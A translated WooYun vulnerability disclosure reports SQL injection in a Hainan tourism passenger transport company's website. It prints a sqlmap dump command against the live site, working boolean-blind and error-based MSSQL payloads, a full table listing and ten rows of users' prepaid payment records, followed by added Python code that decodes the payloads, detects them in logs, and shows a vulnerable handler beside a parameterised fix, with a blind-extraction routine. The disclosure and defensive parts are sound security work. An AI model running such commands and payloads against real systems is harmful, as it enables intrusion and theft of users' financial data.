Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0156615

Title: SQL injection in the main site of Hainan Tourism Passenger Transport Management Service Co., Ltd. (海南省旅游客运管理服务有限公司), exposing the payment records of 730,000 users

Related vendor: CNCERT (国家互联网应急中心, National Internet Emergency Center)

Author: 路人甲 (an anonymous "Passerby A" handle)

Submitted: 2015-11-29 23:28

Fixed: 2016-01-17 15:26

Published: 2016-01-17 15:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed over to a third-party partner organisation (CNCERT) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-11-29: details sent to the vendor, awaiting vendor handling
2015-12-03: vendor confirmed; details visible to the vendor only
2015-12-13: details disclosed to core white hats and domain experts
2015-12-23: details disclosed to regular white hats
2016-01-02: details disclosed to intern white hats
2016-01-17: details disclosed to the public

Brief description:

SQL injection in the main site of Hainan Tourism Passenger Transport Management Service Co., Ltd., exposing the payment records of 730,000 users.

Detailed description:

URL: http://**.**.**.**/affiche_show.aspx?strAfficheId=273

The GET parameter strAfficheId is injectable. The dump below was taken with sqlmap restricted to the boolean-blind and error-based techniques (--technique=BE), pulling the first ten rows of the prepaid-balance table (the column is Unit_Id, as in the table output; the original command misspelt it as Unit_d):

$ python sqlmap.py -u "http://**.**.**.**/affiche_show.aspx?strAfficheId=273" -p strAfficheId --technique=BE --random-agent --batch -D TC_Database -T dbo.T_Traveler_PrePay -C User_Id,PrePay_Money,PrePay_Time,Have_Money,Action_Reason,Unit_Id,Traveler_Id --dump --start 1 --stop 10


Database: TC_Database
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.T_Traveler_PrePay | 738080 |
+--------------------------------------------------+---------+


Database: TC_Database
Table: T_Traveler_PrePay
[10 entries]
+---------+--------------+--------------------+------------+---------------+---------+-------------+
| User_Id | PrePay_Money | PrePay_Time | Have_Money | Action_Reason | Unit_Id | Traveler_Id |
+---------+--------------+--------------------+------------+---------------+---------+-------------+
| 653 | 999.90 | 12 31 2014 11:07AM | 99994.69 | %u7f34%u7eb3 | 1 | 99 |
| 227 | 9573.90 | 12 30 2011 7:01AM | 9951.88 | %u8db3%u989d | 10 | 10 |
| 299 | 4504.08 | 09 24 2009 1:56PM | 195.92 | %u8db3%u989d | 100 | 100 |
| 878 | 9944.46 | 12 31 2013 10:22PM | 9954.81 | %u8db3%u989d | 101 | 101 |
| 239 | 959.00 | 12 31 2012 5:54PM | 9962.35 | %u8db3%u989d | 102 | 102 |
| 203 | 629.16 | 09 8 2010 10:13AM | 903.23 | %u8db3%u989d | 103 | 103 |
| 592 | 7380.00 | 12 2 2009 7:42AM | 8838.92 | %u8db3%u989d | 104 | 104 |
| 920 | 960.00 | 12 31 2012 8:02AM | 9992.41 | %u8db3%u989d | 105 | 105 |
| 260 | 933.76 | 12 26 2009 10:05AM | 9550.69 | %u8db3%u989d | 106 | 106 |
| 460 | 9915.00 | 12 31 2013 12:21PM | 99952.99 | %u8db3%u989d | 107 | 107 |
+---------+--------------+--------------------+------------+---------------+---------+-------------+

The Action_Reason values are stored as %u-encoded UTF-16 code units (the form JavaScript's escape() produces): %u7f34%u7eb3 is 缴纳 ("paid in") and %u8db3%u989d is 足额 ("paid in full"). PrePay_Money and Have_Money are the prepaid amount and the remaining balance per traveller account.

Proof:

---
Parameter: strAfficheId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: strAfficheId=273 AND 1912=1912
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: strAfficheId=273 AND 5608=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (5608=5608) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user: 'saWeb'
current user is DBA: False
database management system users [2]:
[*] sa
[*] saWeb
database management system users password hashes:
[*] sa [1]:
password hash: +
[*] saWeb [1]:
password hash: +
Database: TC_Database
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.T_Traveler_PrePay | 738080 |
| dbo.T_SendCar_PrintCount | 703497 |
| dbo.T_SendCar_Buy | 217343 |
| dbo.T_SendCar_Used | 215982 |
| dbo.T_SendCar | 212441 |
| dbo.T_SendCar_TravelOrderCode | 193434 |
| dbo.T_PrintRecord | 177966 |
| dbo.T_CarSecurity_AlBan | 164821 |
| dbo.T_SendCarApply | 129367 |
| dbo.GovTravelAgency | 101049 |
| dbo.T_Log | 72340 |
| dbo.t_AcceptSendCar | 67153 |
| dbo.T_BalanceDetail | 56131 |
| dbo.T_SendCar_CancelSetting | 35378 |
| dbo.T_BalanceCarDays | 33686 |
| dbo.T_CarCompanyApply | 25339 |
| dbo.T_SendCar_UsedTem | 11697 |
| dbo.T_SendCarTem | 11697 |
| dbo.T_Guides | 11096 |
| dbo.T_DriverAssesssPaiMing | 10982 |
| dbo.T_Breach | 10102 |
| dbo.t_PosLog | 9645 |
| dbo.T_DriverMonthBalance | 8138 |
| dbo.t_SendcarDriverAssesss | 7777 |
| dbo.T_CarKongShiQianDaoDetail | 7736 |
| dbo.T_CarWorkDaysDetail | 7692 |
| dbo.T_CarWaitCity | 6701 |
| dbo.T_Perview | 6033 |
| dbo.T_SendCarPlan | 5914 |
| dbo.T_Car_SheHui | 5805 |
| dbo.t_CarSign | 5433 |
| dbo.T_Sys_Para | 5112 |
| dbo.T_StaffLogin_Log | 3994 |
| dbo.T_Driver | 3928 |
| dbo.T_Car_Stop | 3457 |
| dbo.T_Car_Roll | 3141 |
| dbo.T_Car_Tem | 2994 |
| dbo.T_Driver_Tem | 2743 |
| dbo.T_CarEmgy | 2562 |
| dbo.T_SheHuiCarSendPolicy | 1879 |
| dbo.BalanceTemp | 1841 |
| dbo.T_Answer | 1835 |
| dbo.T_Car | 1800 |
| dbo.T_notify | 1667 |
| dbo.T_Staff | 1519 |
| dbo.t_CarOwer | 1438 |
| dbo.OwnerBank | 1372 |
| dbo.T_Client | 1352 |
| dbo.A_CarPhoto | 1327 |
| dbo.T_YanZhengMa | 1116 |
| dbo.T_Staff_Notify | 986 |
| dbo.T_PerivewGP | 738 |
| dbo.T_SendCarPlanQuanXian | 694 |
| dbo.T_Seat_Price | 656 |
| dbo.T_Unit | 587 |
| dbo.T_XZ_Driver | 569 |
| dbo.T_OperateSysRunProcess_Log | 466 |
| dbo.T_Affiche | 457 |
| dbo.MSreplication_objects | 228 |
| dbo.T_Price | 192 |
| dbo.T_ElectronCachet | 161 |
| dbo.MSsnapshotdeliveryprogress | 152 |
| dbo.T_CarPH | 151 |
| dbo.TenSeatChange | 144 |
| dbo.T_BalanceCarSeries | 138 |
| dbo.A_PosFail | 134 |
| dbo.T_News | 120 |
| dbo.t_CarOwer_Tem | 117 |
| dbo.T_Function | 112 |
| dbo.T_JourneyPoint | 91 |
| dbo.T_Punish | 91 |
| dbo.tempLength | 69 |
| dbo.yjtem | 68 |
| dbo.A_baobanch | 64 |
| dbo.T_BalanceMain | 63 |
| dbo.A_GCar | 36 |
| dbo.T_AllowSendCarUnit | 34 |
| dbo.TeSeatChange | 32 |
| dbo.TeSeatChangeT | 29 |
| dbo.T_PerviewG | 23 |
| dbo.BTep | 18 |
| dbo.T_Complain | 10 |
| dbo.syncobj_0x3037394341383045 | 6 |
| dbo.T_FriendLink | 6 |
| dbo.T_BalanceSeriesRate | 4 |
| dbo.T_Peccancy | 3 |
| dbo.MSsubscription_agents | 2 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_properties | 1 |
| dbo.T_BusinessCompany | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 67941 |
| sys.sysmessages | 67941 |
| sys.syscolumns | 10642 |
| sys.all_parameters | 6697 |
| sys.system_parameters | 6697 |
| sys.trace_subclass_values | 4722 |
| sys.trace_event_bindings | 3958 |
| sys.all_columns | 3740 |
| sys.system_columns | 3696 |
| sys.syscomments | 2744 |
| dbo.spt_values | 2346 |
| sys.all_objects | 1747 |
| sys.sysobjects | 1747 |
| sys.system_objects | 1741 |
| sys.database_permissions | 1641 |
| sys.syspermissions | 1641 |
| sys.sysprotects | 1640 |
| sys.all_sql_modules | 1589 |
| sys.system_sql_modules | 1589 |
| sys.all_views | 284 |
| sys.system_views | 284 |
| sys.event_notification_event_types | 193 |
| sys.trace_events | 171 |
| sys.syscharsets | 114 |
| sys.allocation_units | 113 |
| sys.partitions | 102 |
| sys.system_components_surface_area_configuration | 98 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.xml_schema_types | 77 |
| sys.trace_columns | 65 |
| sys.configurations | 62 |
| sys.sysconfigures | 62 |
| sys.syscurconfigs | 62 |
| sys.fulltext_document_types | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.syslanguages | 33 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| INFORMATION_SCHEMA.SCHEMATA | 17 |
| sys.fulltext_languages | 17 |
| sys.schemas | 17 |
| sys.xml_schema_component_placements | 17 |
| sys.database_principals | 14 |
| sys.sysusers | 14 |
| sys.xml_schema_attributes | 14 |
| sys.database_mirroring | 12 |
| sys.database_recovery_status | 12 |
| sys.databases | 12 |
| sys.sysdatabases | 12 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.sysindexes | 10 |
| sys.stats_columns | 9 |
| sys.server_permissions | 7 |
| sys.sql_dependencies | 7 |
| sys.sysdepends | 7 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.servers | 3 |
| sys.service_queue_usages | 3 |
| sys.syssegments | 3 |
| sys.sysservers | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.login_token | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_role_members | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 21979 |
| dbo.backupmediafamily | 10914 |
| dbo.backupmediaset | 10914 |
| dbo.backupset | 10914 |
| dbo.restorefile | 375 |
| dbo.restorehistory | 197 |
| dbo.restorefilegroup | 138 |
+--------------------------------------------------+---------+


Database: TC_Database
Table: T_Traveler_PrePay
[9 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| Action_Reason | varchar |
| Have_Money | numeric |
| PrePay_Money | numeric |
| PrePay_Time | datetime |
| PrePay_Type | int |
| Relation_Object | varchar |
| Traveler_Id | int |
| Unit_Id | int |
| User_Id | int |
+-----------------+----------+
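How the two payloads in the proof actually work, plus the check a defender would run over the web server's logs, as an added example that is not part of the original report and not sqlmap's own code. The two payload strings are copied verbatim from the sqlmap output above; the SQL Server error message, the IIS log lines and the client address are constructed for the example, and the marker strings qxqqq / qxqjq are simply the CHAR() prefix and suffix that the error-based payload itself builds.

```python
import re
from urllib.parse import quote, unquote_plus

# Payloads exactly as sqlmap reported them in the proof section.
BOOLEAN_PAYLOAD = "strAfficheId=273 AND 1912=1912"
ERROR_PAYLOAD = (
    "strAfficheId=273 AND 5608=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)"
    "+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (5608=5608) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)))"
)

CHAR_RE = re.compile(r"CHAR\((\d+)\)")
CASE_RE = re.compile(r"CASE WHEN \((\d+)=(\d+)\) THEN CHAR\((\d+)\) ELSE CHAR\((\d+)\) END")


def decode_char_chain(payload):
    """Rebuild the string the CHAR()+CHAR()... chain produces on the server.

    The inner CASE WHEN is folded first, the way MSSQL evaluates it, so the
    result is exactly what CONVERT(INT, ...) is asked to cast and fails on.
    """
    def fold_case(m):
        lhs, rhs, then_code, else_code = m.groups()
        return "CHAR(%s)" % (then_code if lhs == rhs else else_code)

    inner = CASE_RE.sub(fold_case, payload).split("CONVERT(INT,", 1)[1]
    return "".join(chr(int(code)) for code in CHAR_RE.findall(inner))


def extract_between_markers(error_text, prefix="qxqqq", suffix="qxqjq"):
    """What sqlmap does with the reflected error: read the bytes between its markers."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text, re.S)
    return m.group(1) if m else None


# Constructed SQL Server conversion error; the page must be reflecting text of
# this kind to the client, otherwise the error-based technique could not work.
SAMPLE_ERROR = ("Conversion failed when converting the varchar value '%s' to data type int."
                % decode_char_chain(ERROR_PAYLOAD))

# Detection side: patterns for the two techniques sqlmap used here. The
# error-based pattern is tested first because that payload also contains "AND".
INJECTION_SIGNS = [
    ("error-based (CONVERT/CHAR)", re.compile(r"CONVERT\s*\(\s*INT\s*,.*CHAR\s*\(\s*\d+\s*\)", re.I | re.S)),
    ("boolean-based blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+\b", re.I)),
]

# Constructed IIS 6.0 W3C extended log lines (not from the target). Query strings
# are URL-encoded the way a client sends them; IIS writes the UA with + for spaces.
_LINE = "2015-11-29 15:10:%02d 10.0.0.5 GET /affiche_show.aspx %s 80 - 203.0.113.7 Mozilla/5.0+(Windows+NT+6.1) %d 0 0"
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 6.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status",
    _LINE % (1, "strAfficheId=273", 200),
    _LINE % (2, quote(BOOLEAN_PAYLOAD, safe="=(),"), 200),
    _LINE % (3, quote("strAfficheId=273 AND 1912=1913", safe="=(),"), 200),
    _LINE % (4, quote(ERROR_PAYLOAD, safe="=(),"), 500),
])


def parse_iis_line(line):
    """Split one W3C line in the #Fields order used above; skip directive lines."""
    if not line.strip() or line.startswith("#"):
        return None
    f = line.split()
    return {"time": f[1], "uri": f[4], "query": unquote_plus(f[5]), "c_ip": f[8], "status": f[10]}


def flag_injection_attempts(log_text):
    """Return (client IP, URI, technique, HTTP status) for every request carrying a payload."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None:
            continue
        for name, rx in INJECTION_SIGNS:
            if rx.search(rec["query"]):
                hits.append((rec["c_ip"], rec["uri"], name, rec["status"]))
                break
    return hits


if __name__ == "__main__":
    print(decode_char_chain(ERROR_PAYLOAD))        # the marker-wrapped probe result
    print(extract_between_markers(SAMPLE_ERROR))   # "1": condition 5608=5608 held
    for hit in flag_injection_attempts(SAMPLE_LOG):
        print(hit)
```

The decoded chain shows why the payload is shaped the way it is: CONVERT(INT, 'qxqqq1qxqjq') can never succeed, so the server's error message carries the probe result back in the response body, and sqlmap only has to read what sits between the two markers. For the blind pair, the true/false requests differ only in the compared constant, which is also what the log check keys on.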

Fix recommendation:

Deploy a WAF.

A WAF only filters what it recognises; the defect itself remains until the query behind affiche_show.aspx is parameterised and strAfficheId is validated as an integer before it reaches SQL. Two further points follow from the proof above: the error-based technique works because SQL Server error text is reflected to the client, so ASP.NET customErrors should be switched on and detailed errors kept out of responses; and the application login saWeb, although not a DBA, can read every table in TC_Database and enumerate master and msdb, so the site should run under a login limited to the tables and operations it actually needs.
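The vulnerable pattern next to its hardened form, with sqlmap's true/false probe run against both, as an added example that is not the site's own code (the real page is ASP.NET on SQL Server 2005 and its source is not on this page). The T_Affiche table and its two rows are constructed, and SQLite stands in for SQL Server so the example runs offline; the injection mechanics are the same.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the notice table behind affiche_show.aspx."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE T_Affiche (Affiche_Id INTEGER PRIMARY KEY, Title TEXT)")
    conn.executemany("INSERT INTO T_Affiche VALUES (?, ?)",
                     [(272, "Notice 272"), (273, "Notice 273")])
    return conn


def show_affiche_vulnerable(conn, str_affiche_id):
    """The defect class in the report: the raw GET value is pasted into the SQL text."""
    sql = "SELECT Title FROM T_Affiche WHERE Affiche_Id = " + str_affiche_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def show_affiche_fixed(conn, str_affiche_id):
    """Hardened form: type-check the input, then bind it as a query parameter."""
    try:
        affiche_id = int(str_affiche_id)
    except ValueError:
        raise ValueError("strAfficheId must be an integer")
    row = conn.execute("SELECT Title FROM T_Affiche WHERE Affiche_Id = ?",
                       (affiche_id,)).fetchone()
    return row[0] if row else None


def boolean_blind_probe(handler, conn, base="273"):
    """sqlmap's boolean-based blind check: does a true condition return a different
    page than a false one? True means the condition was evaluated by the database."""
    def call(value):
        try:
            return handler(conn, value)
        except (ValueError, sqlite3.Error):
            return "<rejected>"
    return call(base + " AND 1912=1912") != call(base + " AND 1912=1913")


def blind_count(handler, conn, table, base="273", hi=1 << 20):
    """What the oracle buys an attacker: COUNT(*) of any readable table by binary
    search, one true/false request per bit. The page reports 738080 rows in
    T_Traveler_PrePay; the constructed table here has 2."""
    def oracle(cond):
        return handler(conn, "%s AND (%s)" % (base, cond)) is not None
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("(SELECT COUNT(*) FROM %s) > %d" % (table, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", boolean_blind_probe(show_affiche_vulnerable, db))
    print("fixed handler injectable:     ", boolean_blind_probe(show_affiche_fixed, db))
    print("rows learned blindly:         ", blind_count(show_affiche_vulnerable, db, "T_Affiche"))
```

The fixed handler rejects "273 AND 1912=1912" before any SQL is built, so both probe requests fail identically and the differential that sqlmap relies on disappears; parameter binding is what keeps an integer that does parse from ever being interpreted as SQL.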

Copyright notice: when reposting, please credit the source: 路人甲@WooYun (乌云)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-03 15:25

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded through CNCERT to the Hainan branch centre, which will coordinate handling with the website's operating organisation.

Latest status:

None yet
